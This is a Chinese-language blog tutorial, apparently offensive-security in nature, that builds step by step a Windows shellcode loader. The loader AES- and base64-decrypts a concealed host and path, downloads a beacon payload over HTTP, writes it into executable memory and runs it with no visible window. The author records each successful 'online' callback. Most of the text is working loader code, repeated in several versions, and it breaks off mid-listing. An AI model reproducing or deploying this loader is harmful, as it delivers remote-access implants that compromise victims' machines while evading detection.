AES+base64+远程加载----ConsoleApplication811项目

ConsoleApplication9.cpp

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")//AES的key和iv
// AES key and IV. Both are plain string literals compiled into the binary, so
// they can be read straight out of the executable. DecryptionAES below calls
// Decrypt with AES::CBC, so the IV is actually used here despite the ECB note.
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg"; // ECB mode does not use the chain; may be left empty
// Base64-decode strSrc, AES-CBC-decrypt it with the file-level g_key / g_iv and
// strip PKCS7 padding. Returns the plaintext as a std::string. If the padding
// bytes disagree, the whole output buffer is zeroed and a message is printed,
// so the returned string is then empty.
//
// NOTE(review): the padding check does not do what it reads as:
//   - `0x00 < szDataOut[length - 1] <= 0x16` parses as
//     `(0x00 < x) <= 0x16`, a bool compared with 22, which is always true.
//   - AES's block is 16 bytes (MakeKey is called with 16, 16), so a valid
//     PKCS7 pad byte is 0x01..0x10, not 0x16.
//   - `length` is size_t while `tmp` and `i` are int; where char is signed a
//     final byte >= 0x80 makes `tmp` negative, and an empty input reads
//     szDataOut[length - 1] out of bounds.
//   - `string strDest(szDataOut)` stops at the first NUL, so binary plaintext
//     is truncated.
string DecryptionAES(const string& strSrc) // AES decryption
{
    string strData = ko::Base64::decode(strSrc);
    size_t length = strData.length();
    // ciphertext
    char* szDataIn = new char[length + 1];
    memcpy(szDataIn, strData.c_str(), length + 1);
    // plaintext
    char* szDataOut = new char[length + 1];
    memcpy(szDataOut, strData.c_str(), length + 1);
    // AES decryption in CBC mode
    AES aes;
    aes.MakeKey(g_key, g_iv, 16, 16);
    aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);
    // strip PKCS7 padding
    if (0x00 < szDataOut[length - 1] <= 0x16)
    {
        int tmp = szDataOut[length - 1];
        for (int i = length - 1; i >= length - tmp; i--)
        {
            if (szDataOut[i] != tmp)
            {
                memset(szDataOut, 0, length);
                cout << "去填充失败!解密出错!!" << endl;
                break;
            }
            else
                szDataOut[i] = 0;
        }
    }
    string strDest(szDataOut);
    delete[] szDataIn;
    delete[] szDataOut;
    return strDest;
}int main()
{void* exec;int payload_len = 280000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHixxxx==";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "uMF83pA41Vm/UzOtowpaCA==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存//使用默认设置创建会话session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应HttpSendRequest(reqfile, NULL, 0, 0, 0);InternetReadFile(reqfile, exec, payload_len, &nread);((void(*)())exec)();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

base64.cpp

#include"base64.h"
#include<assert.h>
#include<iostream>
// The 64-symbol base64 alphabet, indexed by 6-bit value 0..63: A-Z, a-z, 0-9, '+', '/'.
const std::string ko::Base64::baseString =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/";
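// Encode the bytes of s as base64 using baseString, with '=' padding so the
// output length is a multiple of 4. An empty input yields an empty string.
//
// Fix: the tail zero-fill ran up to index 3 of the 3-byte input group, which
// wrote one byte past the end of array3 whenever s.length() % 3 != 0.
std::string ko::Base64::encode(const std::string& s) {
    const std::size_t group = s.length() / 3;          // complete 3-byte groups
    const std::size_t remain = s.length() - 3 * group; // 0, 1 or 2 trailing bytes
    std::string ret;
    ret.reserve(4 * group + 4);

    unsigned char array3[3];
    unsigned char array4[4];
    std::size_t pos = 0;

    // Split the current 3-byte group into four 6-bit indices into baseString.
    auto pack = [&]() {
        array4[0] = (array3[0] & 0xFC) >> 2;
        array4[1] = ((array3[0] & 0x03) << 4) + ((array3[1] & 0xF0) >> 4);
        array4[2] = ((array3[1] & 0x0F) << 2) + ((array3[2] & 0xC0) >> 6);
        array4[3] = array3[2] & 0x3F;
    };

    for (std::size_t g = 0; g < group; ++g) {
        for (int i = 0; i < 3; ++i)
            array3[i] = static_cast<unsigned char>(s[pos++]);
        pack();
        for (int i = 0; i < 4; ++i)
            ret.push_back(baseString[array4[i]]);
    }

    if (remain > 0) {
        for (std::size_t i = 0; i < remain; ++i)
            array3[i] = static_cast<unsigned char>(s[pos++]);
        for (std::size_t i = remain; i < 3; ++i) // was `i < 4`: out-of-bounds write
            array3[i] = 0;
        pack();
        // remain input bytes produce remain + 1 symbols; the rest is '=' padding.
        for (std::size_t i = 0; i < remain + 1; ++i)
            ret.push_back(baseString[array4[i]]);
        for (std::size_t i = remain + 1; i < 4; ++i)
            ret.push_back('=');
    }
    return ret;
}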
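// Decode base64 text produced with the baseString alphabet.
//
// '=' and any character outside the alphabet map to kPad; the previous version
// obtained the same 0xFF by narrowing std::string::npos into an unsigned char,
// which is now written out explicitly. Characters outside the alphabet are
// therefore still accepted silently and treated as padding — callers needing
// strict validation must check the input first. The length check is an
// assert, so in a release build any trailing partial quartet is ignored.
std::string ko::Base64::decode(const std::string& s) {
    static constexpr unsigned char kPad = 255;
    const std::size_t group = s.length() / 4;
    const std::size_t remain = s.length() - 4 * group;
    assert(remain == 0);

    std::string ret;
    ret.reserve(3 * group);

    // One input character -> its 6-bit value, or kPad for '=' / non-alphabet.
    auto sextet = [](char c) -> unsigned char {
        const std::size_t idx = baseString.find(c);
        return idx == std::string::npos ? kPad : static_cast<unsigned char>(idx);
    };

    std::size_t pos = 0;
    unsigned char array4[4];
    unsigned char array3[3];
    for (std::size_t g = 0; g < group; ++g) {
        for (int i = 0; i < 4; ++i)
            array4[i] = sextet(s[pos++]);
        array3[0] = (array4[0] << 2) + ((array4[1] & 0x30) >> 4);
        array3[1] = ((array4[1] & 0xf) << 4) + ((array4[2] & 0x3c) >> 2);
        array3[2] = ((array4[2] & 0x3) << 6) + array4[3];
        // Where the padding starts decides how many bytes this quartet carries.
        if (array4[2] == kPad) {
            ret.push_back(array3[0]);
        } else if (array4[3] == kPad) {
            ret.push_back(array3[0]);
            ret.push_back(array3[1]);
        } else {
            ret.push_back(array3[0]);
            ret.push_back(array3[1]);
            ret.push_back(array3[2]);
        }
    }
    return ret;
}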

base64.h

#pragma once
#include<string>
namespace ko {
// Minimal base64 codec over the standard 64-character alphabet.
class Base64 {
private:
    // The alphabet A-Z, a-z, 0-9, '+', '/'; defined in base64.cpp.
    static const std::string baseString;
public:
    // Encode the bytes of s; output is '='-padded to a multiple of 4.
    static std::string encode(const std::string& s);
    // Inverse of encode. Expects a length that is a multiple of 4 (checked with
    // assert only, so not enforced in release builds).
    static std::string decode(const std::string& s);
};
}

AES.h

//AES.h#ifndef _AES_H
#define _AES_H
#include <exception>
#include <cstring>
#include <string>
#define BLOCK_SIZE 16
using namespace std;
// Rijndael/AES block cipher. MakeKey sets up the key and chaining block;
// Encrypt / Decrypt then process n bytes in the selected mode. AES.cpp is not
// shown on this page, so the notes below describe the interface only.
class AES
{
public:
    enum { ECB = 0, CBC = 1, CFB = 2 }; // iMode values for Encrypt / Decrypt
private:
    enum { DEFAULT_BLOCK_SIZE = 16 };
    enum { MAX_BLOCK_SIZE = 32, MAX_ROUNDS = 14, MAX_KC = 8, MAX_BC = 8 };
public:
    AES();
    virtual ~AES();
private:
    // Key Initialization Flag
    bool m_bKeyInit;
    // Encryption (m_Ke) round key
    int m_Ke[MAX_ROUNDS + 1][MAX_BC];
    // Decryption (m_Kd) round key
    int m_Kd[MAX_ROUNDS + 1][MAX_BC];
    // Key Length
    int m_keylength;
    // Block Size
    int m_blockSize;
    // Number of Rounds
    int m_iROUNDS;
    // Chain Block (m_chain0 presumably keeps the initial value, m_chain the running one — confirm in AES.cpp)
    char m_chain0[MAX_BLOCK_SIZE];
    char m_chain[MAX_BLOCK_SIZE];
    // Auxiliary private use buffers
    int tk[MAX_KC];
    int a[MAX_BC];
    int t[MAX_BC];
private:
    void Xor(char* buff, char const* chain);
    void DefEncryptBlock(char const* in, char* result);
    void DefDecryptBlock(char const* in, char* result);
    void EncryptBlock(char const* in, char* result);
    void DecryptBlock(char const* in, char* result);
public:
    // Key setup. keylength / blockSize appear to be byte counts (the caller on
    // this page passes 16, 16); chain is the IV for the chained modes.
    void MakeKey(char const* key, char const* chain, int keylength = DEFAULT_BLOCK_SIZE, int blockSize = DEFAULT_BLOCK_SIZE);
    // n is the number of bytes in `in`; iMode is one of ECB / CBC / CFB.
    void Encrypt(char const* in, char* result, size_t n, int iMode = ECB);
    void Decrypt(char const* in, char* result, size_t n, int iMode = ECB);
};
#endif // __RIJNDAEL_H__

AES.cpp
太大了就不放了

效果:
在这里插入图片描述
在这里插入图片描述
可以看到成功上线

到这里,我们的 URL 部分已经实现了一种方式:通过 AES 解密出地址并成功下载 beacon811.bin 文件。既然请求地址经过 AES+base64 编码解码后能成功还原,并且文件也成功下载了,那么这一功能就完成了。

接下来我们写文件内容的加密和解密。因为是二进制文件,第一步先在服务端对它做 base64 加密,然后在木马中再进行解密。我们先把它用 base64 打印出来,发现控制台看不到,那么就写到一个文件里看看。
增加如下代码

std::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);
base64EncodedContent = ko::Base64::encode(base64EncodedContent);//Save the Base64-encoded content to a file
std::ofstream outFile("base64_encoded_content.txt", std::ios::out);
outFile << base64EncodedContent;
outFile.close();

注意用到outFile需要引入

#include <fstream>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到成功写入。那么我们怎么确定写入的就是 shellcode 经 base64 编码后的内容呢?
那么我们解密触发看看是否上线
将写入文件的注释掉,增加两行代码

base64EncodedContent = ko::Base64::decode(base64EncodedContent);((void(*)())exec)();

在这里插入图片描述
可以看到成功上线,nice

这一阶段的全部代码

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")//AES的key和iv
// AES key and IV. Both are plain string literals compiled into the binary, so
// they can be read straight out of the executable. DecryptionAES below calls
// Decrypt with AES::CBC, so the IV is actually used here despite the ECB note.
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg"; // ECB mode does not use the chain; may be left empty
// Base64-decode strSrc, AES-CBC-decrypt it with the file-level g_key / g_iv and
// strip PKCS7 padding. Returns the plaintext as a std::string. If the padding
// bytes disagree, the whole output buffer is zeroed and a message is printed,
// so the returned string is then empty.
//
// NOTE(review): the padding check does not do what it reads as:
//   - `0x00 < szDataOut[length - 1] <= 0x16` parses as
//     `(0x00 < x) <= 0x16`, a bool compared with 22, which is always true.
//   - AES's block is 16 bytes (MakeKey is called with 16, 16), so a valid
//     PKCS7 pad byte is 0x01..0x10, not 0x16.
//   - `length` is size_t while `tmp` and `i` are int; where char is signed a
//     final byte >= 0x80 makes `tmp` negative, and an empty input reads
//     szDataOut[length - 1] out of bounds.
//   - `string strDest(szDataOut)` stops at the first NUL, so binary plaintext
//     is truncated.
string DecryptionAES(const string& strSrc) // AES decryption
{
    string strData = ko::Base64::decode(strSrc);
    size_t length = strData.length();
    // ciphertext
    char* szDataIn = new char[length + 1];
    memcpy(szDataIn, strData.c_str(), length + 1);
    // plaintext
    char* szDataOut = new char[length + 1];
    memcpy(szDataOut, strData.c_str(), length + 1);
    // AES decryption in CBC mode
    AES aes;
    aes.MakeKey(g_key, g_iv, 16, 16);
    aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);
    // strip PKCS7 padding
    if (0x00 < szDataOut[length - 1] <= 0x16)
    {
        int tmp = szDataOut[length - 1];
        for (int i = length - 1; i >= length - tmp; i--)
        {
            if (szDataOut[i] != tmp)
            {
                memset(szDataOut, 0, length);
                cout << "去填充失败!解密出错!!" << endl;
                break;
            }
            else
                szDataOut[i] = 0;
        }
    }
    string strDest(szDataOut);
    delete[] szDataIn;
    delete[] szDataOut;
    return strDest;
}int main()
{void* exec;int payload_len = 280000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "uMF83pA41Vm/UzOtowpaCA==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存//使用默认设置创建会话session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应HttpSendRequest(reqfile, NULL, 0, 0, 0);InternetReadFile(reqfile, exec, payload_len, &nread);// Convert the vector to Base64-encoded stringstd::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);base64EncodedContent = ko::Base64::encode(base64EncodedContent);base64DecodedContent = ko::Base64::decode(base64EncodedContent);((void(*)())exec)();//Save the Base64-encoded content to a file//std::ofstream outFile("base64_encoded_content.txt", std::ios::out);//outFile << base64EncodedContent;//outFile.close();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

那么我们确定内容没问题后,接下来在此 base64EncodedContent 上改造加解密就可以了,因为它是字符串形式,而不是难搞的二进制。

但是到这里我发现我傻了:这样和 base64 根本没有关系,因为我是调用 exec 指针执行的,运行的还是之前内存中的东西,而不是经 base64 编码再解码后载入内存的内容。
那么我继续修改,目的是让我们得到的base64DecodedContent进行内存加载
在这里插入图片描述
在这里插入图片描述
可以看到成功上线
这里给出全部代码

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")void decode(string& c, int key[]) {int len = c.size();for (int i = 0; i < len; i++) {c[i] = c[i] ^ key[i % 7]; //使用循环遍历字符串 c 中的每个字符。在每次迭代中,执行异或操作 c[i] ^ key[i % 7],将字符串的当前字符与密钥数组中对应位置的值进行异或运算。}
}//AES的key和iv
// AES key and IV. Both are plain string literals compiled into the binary, so
// they can be read straight out of the executable. DecryptionAES below calls
// Decrypt with AES::CBC, so the IV is actually used here despite the ECB note.
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg"; // ECB mode does not use the chain; may be left empty
// Base64-decode strSrc, AES-CBC-decrypt it with the file-level g_key / g_iv and
// strip PKCS7 padding. Returns the plaintext as a std::string. If the padding
// bytes disagree, the whole output buffer is zeroed and a message is printed,
// so the returned string is then empty.
//
// NOTE(review): the padding check does not do what it reads as:
//   - `0x00 < szDataOut[length - 1] <= 0x16` parses as
//     `(0x00 < x) <= 0x16`, a bool compared with 22, which is always true.
//   - AES's block is 16 bytes (MakeKey is called with 16, 16), so a valid
//     PKCS7 pad byte is 0x01..0x10, not 0x16.
//   - `length` is size_t while `tmp` and `i` are int; where char is signed a
//     final byte >= 0x80 makes `tmp` negative, and an empty input reads
//     szDataOut[length - 1] out of bounds.
//   - `string strDest(szDataOut)` stops at the first NUL, so binary plaintext
//     is truncated.
string DecryptionAES(const string& strSrc) // AES decryption
{
    string strData = ko::Base64::decode(strSrc);
    size_t length = strData.length();
    // ciphertext
    char* szDataIn = new char[length + 1];
    memcpy(szDataIn, strData.c_str(), length + 1);
    // plaintext
    char* szDataOut = new char[length + 1];
    memcpy(szDataOut, strData.c_str(), length + 1);
    // AES decryption in CBC mode
    AES aes;
    aes.MakeKey(g_key, g_iv, 16, 16);
    aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);
    // strip PKCS7 padding
    if (0x00 < szDataOut[length - 1] <= 0x16)
    {
        int tmp = szDataOut[length - 1];
        for (int i = length - 1; i >= length - tmp; i--)
        {
            if (szDataOut[i] != tmp)
            {
                memset(szDataOut, 0, length);
                cout << "去填充失败!解密出错!!" << endl;
                break;
            }
            else
                szDataOut[i] = 0;
        }
    }
    string strDest(szDataOut);
    delete[] szDataIn;
    delete[] szDataOut;
    return strDest;
}int key[] = { 1,2,3,4,5,6,7 };int main()
{void* exec;int payload_len = 280000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "uMF83pA41Vm/UzOtowpaCA==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存//使用默认设置创建会话session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应HttpSendRequest(reqfile, NULL, 0, 0, 0);InternetReadFile(reqfile, exec, payload_len, &nread);// Convert the vector to Base64-encoded stringstd::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);std::string base64DecodedContent;base64EncodedContent = ko::Base64::encode(base64EncodedContent);base64DecodedContent = ko::Base64::decode(base64EncodedContent);void* alloc = VirtualAlloc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (alloc == nullptr) {std::cerr << "Failed to allocate memory." 
<< std::endl;return 1;}// Copy decoded content to allocated memorymemcpy(alloc, base64DecodedContent.data(), base64DecodedContent.size());// Execute the allocated contentvoid (*shellcode)() = reinterpret_cast<void(*)()>(alloc);shellcode();// Free the allocated memoryVirtualFree(alloc, 0, MEM_RELEASE);//((void(*)())exec)();//Save the Base64-encoded content to a file//std::ofstream outFile("base64_encoded_content.txt", std::ios::out);//outFile << base64EncodedContent;//outFile.close();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

那么我们直接把 base64 编码好的 a.txt 文件放到服务器上,远程加载试试。
发现失败,我又进行了排查(通过写入文件数据是否一致进行排查)

    std::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);std::string base64DecodedContent;std::ofstream outFile("encoded_content.txt", std::ios::out);outFile << base64EncodedContent;outFile.close();

在这里插入图片描述
发现写出的文件是 0 KB。我换成了 123456 编码后的 base64,发现读取成功了,于是想到是长度的问题(base64 编码后的数据约为原始数据的 4/3 大小,缓冲区要按编码后的长度来留),那么我增大 payload_len:之前是 280000,现在改成 500000。
在这里插入图片描述
在这里插入图片描述

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")void decode(string& c, int key[]) {int len = c.size();for (int i = 0; i < len; i++) {c[i] = c[i] ^ key[i % 7]; //使用循环遍历字符串 c 中的每个字符。在每次迭代中,执行异或操作 c[i] ^ key[i % 7],将字符串的当前字符与密钥数组中对应位置的值进行异或运算。}
}//AES的key和iv
// AES key and IV. Both are plain string literals compiled into the binary, so
// they can be read straight out of the executable. DecryptionAES below calls
// Decrypt with AES::CBC, so the IV is actually used here despite the ECB note.
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg"; // ECB mode does not use the chain; may be left empty
// Base64-decode strSrc, AES-CBC-decrypt it with the file-level g_key / g_iv and
// strip PKCS7 padding. Returns the plaintext as a std::string. If the padding
// bytes disagree, the whole output buffer is zeroed and a message is printed,
// so the returned string is then empty.
//
// NOTE(review): the padding check does not do what it reads as:
//   - `0x00 < szDataOut[length - 1] <= 0x16` parses as
//     `(0x00 < x) <= 0x16`, a bool compared with 22, which is always true.
//   - AES's block is 16 bytes (MakeKey is called with 16, 16), so a valid
//     PKCS7 pad byte is 0x01..0x10, not 0x16.
//   - `length` is size_t while `tmp` and `i` are int; where char is signed a
//     final byte >= 0x80 makes `tmp` negative, and an empty input reads
//     szDataOut[length - 1] out of bounds.
//   - `string strDest(szDataOut)` stops at the first NUL, so binary plaintext
//     is truncated.
string DecryptionAES(const string& strSrc) // AES decryption
{
    string strData = ko::Base64::decode(strSrc);
    size_t length = strData.length();
    // ciphertext
    char* szDataIn = new char[length + 1];
    memcpy(szDataIn, strData.c_str(), length + 1);
    // plaintext
    char* szDataOut = new char[length + 1];
    memcpy(szDataOut, strData.c_str(), length + 1);
    // AES decryption in CBC mode
    AES aes;
    aes.MakeKey(g_key, g_iv, 16, 16);
    aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);
    // strip PKCS7 padding
    if (0x00 < szDataOut[length - 1] <= 0x16)
    {
        int tmp = szDataOut[length - 1];
        for (int i = length - 1; i >= length - tmp; i--)
        {
            if (szDataOut[i] != tmp)
            {
                memset(szDataOut, 0, length);
                cout << "去填充失败!解密出错!!" << endl;
                break;
            }
            else
                szDataOut[i] = 0;
        }
    }
    string strDest(szDataOut);
    delete[] szDataIn;
    delete[] szDataOut;
    return strDest;
}int key[] = { 1,2,3,4,5,6,7 };int main()
{void* exec;int payload_len = 500000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "lTbb3qMe8NsPKPjzTRaEzg==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存//使用默认设置创建会话session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应HttpSendRequest(reqfile, NULL, 0, 0, 0);InternetReadFile(reqfile, exec, payload_len, &nread);// Convert the vector to Base64-encoded stringstd::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);std::string base64DecodedContent;std::ofstream outFile("encoded_content.txt", std::ios::out);outFile << base64EncodedContent;outFile.close();//base64EncodedContent = ko::Base64::encode(base64EncodedContent);//base64DecodedContent = ko::Base64::decode(base64EncodedContent);//void* alloc = VirtualAlloc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//if (alloc == nullptr) {//    std::cerr << "Failed to allocate memory." 
<< std::endl;//    return 1;//} Copy decoded content to allocated memory//memcpy(alloc, base64DecodedContent.data(), base64DecodedContent.size()); Execute the allocated content//void (*shellcode)() = reinterpret_cast<void(*)()>(alloc);//shellcode(); Free the allocated memory//VirtualFree(alloc, 0, MEM_RELEASE);//((void(*)())exec)();//Save the Base64-encoded content to a file//std::ofstream outFile("base64_encoded_content.txt", std::ios::out);//outFile << base64EncodedContent;//outFile.close();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

可以看到成功写入,那么我们再改回之前的代码,继续运行。
在这里插入图片描述
成功了,一路踩坑,不过这下好了
全代码(注释自己手动去掉就好)

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")void decode(string& c, int key[]) {int len = c.size();for (int i = 0; i < len; i++) {c[i] = c[i] ^ key[i % 7]; //使用循环遍历字符串 c 中的每个字符。在每次迭代中,执行异或操作 c[i] ^ key[i % 7],将字符串的当前字符与密钥数组中对应位置的值进行异或运算。}
}//AES的key和iv
// AES key and IV. Both are plain string literals compiled into the binary, so
// they can be read straight out of the executable. DecryptionAES below calls
// Decrypt with AES::CBC, so the IV is actually used here despite the ECB note.
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg"; // ECB mode does not use the chain; may be left empty
// Base64-decode strSrc, AES-CBC-decrypt it with the file-level g_key / g_iv and
// strip PKCS7 padding. Returns the plaintext as a std::string. If the padding
// bytes disagree, the whole output buffer is zeroed and a message is printed,
// so the returned string is then empty.
//
// NOTE(review): the padding check does not do what it reads as:
//   - `0x00 < szDataOut[length - 1] <= 0x16` parses as
//     `(0x00 < x) <= 0x16`, a bool compared with 22, which is always true.
//   - AES's block is 16 bytes (MakeKey is called with 16, 16), so a valid
//     PKCS7 pad byte is 0x01..0x10, not 0x16.
//   - `length` is size_t while `tmp` and `i` are int; where char is signed a
//     final byte >= 0x80 makes `tmp` negative, and an empty input reads
//     szDataOut[length - 1] out of bounds.
//   - `string strDest(szDataOut)` stops at the first NUL, so binary plaintext
//     is truncated.
string DecryptionAES(const string& strSrc) // AES decryption
{
    string strData = ko::Base64::decode(strSrc);
    size_t length = strData.length();
    // ciphertext
    char* szDataIn = new char[length + 1];
    memcpy(szDataIn, strData.c_str(), length + 1);
    // plaintext
    char* szDataOut = new char[length + 1];
    memcpy(szDataOut, strData.c_str(), length + 1);
    // AES decryption in CBC mode
    AES aes;
    aes.MakeKey(g_key, g_iv, 16, 16);
    aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);
    // strip PKCS7 padding
    if (0x00 < szDataOut[length - 1] <= 0x16)
    {
        int tmp = szDataOut[length - 1];
        for (int i = length - 1; i >= length - tmp; i--)
        {
            if (szDataOut[i] != tmp)
            {
                memset(szDataOut, 0, length);
                cout << "去填充失败!解密出错!!" << endl;
                break;
            }
            else
                szDataOut[i] = 0;
        }
    }
    string strDest(szDataOut);
    delete[] szDataIn;
    delete[] szDataOut;
    return strDest;
}int key[] = { 1,2,3,4,5,6,7 };int main()
